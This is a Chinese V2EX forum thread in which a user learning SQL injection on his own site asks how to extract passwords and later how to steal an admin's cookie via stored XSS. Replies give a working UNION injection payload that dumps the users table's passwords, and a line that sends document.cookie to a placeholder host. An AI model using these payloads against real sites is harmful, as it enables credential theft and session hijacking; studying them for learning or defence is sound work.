V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
MrGba2z
V2EX  ›  信息安全

[求助]关于 SQL 注入

  •  
  •   MrGba2z · 2015-02-25 02:01:52 +08:00 · 3132 次点击
    这是一个创建于 3561 天前的主题,其中的信息可能已经有所发展或是发生改变。

    我正在学习SQL注入
    自建的网站里的查询语句是:

    SELECT name, surname, username, passwd, is_admin FROM users WHERE username='***********';
    

    星号是输入内容,
    但是不管怎样出错他都只会返回username,
    我可以不断尝试拿到不同的username,
    但是怎样能把passwd放到username里返回呢?
    我想的是类似于构造出

    SELECT name, surname, passwd, username, is_admin FROM users WHERE username='某用户名';
    

    但试了不同的组合, 都无法成功. 不知道应该怎样构造语句.

    Thanks in advance!

    第 1 条附言  ·  2015-02-25 03:00:49 +08:00
    已解决
    19 条回复    2015-02-25 12:24:53 +08:00
    mhycy
        1
    mhycy  
       2015-02-25 02:05:12 +08:00
    你想做啥。。。。囧
    typcn
        2
    typcn  
       2015-02-25 02:07:11 +08:00
    盲注?借助工具吧
    MrGba2z
        3
    MrGba2z  
    OP
       2015-02-25 02:07:24 +08:00
    @mhycy 这是学习啊...网站是我自己搭的..
    MrGba2z
        4
    MrGba2z  
    OP
       2015-02-25 02:08:21 +08:00
    @typcn 不是盲注 我知道网站源码
    sandtears
        5
    sandtears  
       2015-02-25 02:13:28 +08:00
    额。。 不是盲注的话,你得给大家看一下网页显示的源码吧。。
    MrGba2z
        6
    MrGba2z  
    OP
       2015-02-25 02:14:06 +08:00
    @RIcter
    大大求助
    MrGba2z
        7
    MrGba2z  
    OP
       2015-02-25 02:15:03 +08:00
    mhycy
        8
    mhycy  
       2015-02-25 02:16:48 +08:00
    报错的是语句,passwd都没查出来怎么返回?
    MrGba2z
        9
    MrGba2z  
    OP
       2015-02-25 02:26:11 +08:00
    @mhycy

    -- Users schema

    CREATE TABLE users(
    id INTEGER PRIMARY KEY NOT NULL,
    name TEXT NOT NULL,
    surname TEXT NOT NULL,
    username TEXT NOT NULL,
    passwd TEXT NOT NULL,
    is_admin BOOLEAN NOT NULL DEFAULT 'f'
    );
    RIcter
        10
    RIcter  
       2015-02-25 03:35:20 +08:00 via iPad
    刚睡醒看到已经解决了…
    --

    -1' union select password from xxx#
    RIcter
        11
    RIcter  
       2015-02-25 09:38:46 +08:00   ❤️ 1
    @RIcter 忘记 limit 0,1 了,完整 payload:

    -1' union select concat(surname, 0x3a, passwd) from users limit 0,1#
    MrGba2z
        12
    MrGba2z  
    OP
       2015-02-25 10:33:48 +08:00
    @RIcter

    还想问下一个关于XSS的问题

    例如我可以在A站以普通用户的身份发布一个不被转义的内容.
    A站管理员会访问我的网站(B站).

    能否讲下大概怎样的过程能拿到A站管理员cookie里的内容?
    RIcter
        13
    RIcter  
       2015-02-25 10:48:34 +08:00
    有一种平台叫做 XSS 平台,比如这个: http://xssnow.com/index.php
    里面有现成可利用的 payload 可以获取 Cookie。

    以至于远离,大抵是这样:

    先获取 Cookie:document.cookie
    然后转义,POST Cookie 的内容到一个接收端,接受端获取后存入数据库。
    RIcter
        14
    RIcter  
       2015-02-25 10:48:48 +08:00
    @RIcter s/远离/原理/g
    kslr
        15
    kslr  
       2015-02-25 10:52:20 +08:00
    @MrGba2z >

    window.open("http://xxx.com?cookie="+document.cookie)
    MrGba2z
        16
    MrGba2z  
    OP
       2015-02-25 11:02:41 +08:00
    @RIcter 没有邀请码 T_T.


    @kslr @RIcter
    我想象的流程是:

    管理员访问我的网站, 我直接首页跳转到他的网站W页面, W页面有我发布的未转义内容, 访问该页面会执行脚本, 获取cookies并发到我的网站.

    请问是否正确?
    RIcter
        17
    RIcter  
       2015-02-25 11:23:13 +08:00
    @MrGba2z 不要邀请码,随便打就行
    MrGba2z
        18
    MrGba2z  
    OP
       2015-02-25 11:54:26 +08:00
    @RIcter
    提示邀请码不正确...
    RIcter
        19
    RIcter  
       2015-02-25 12:24:53 +08:00 via iPhone
    @MrGba2z 可能現在要邀請碼了吧⋯
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   1007 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 25ms · UTC 23:00 · PVG 07:00 · LAX 15:00 · JFK 18:00
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.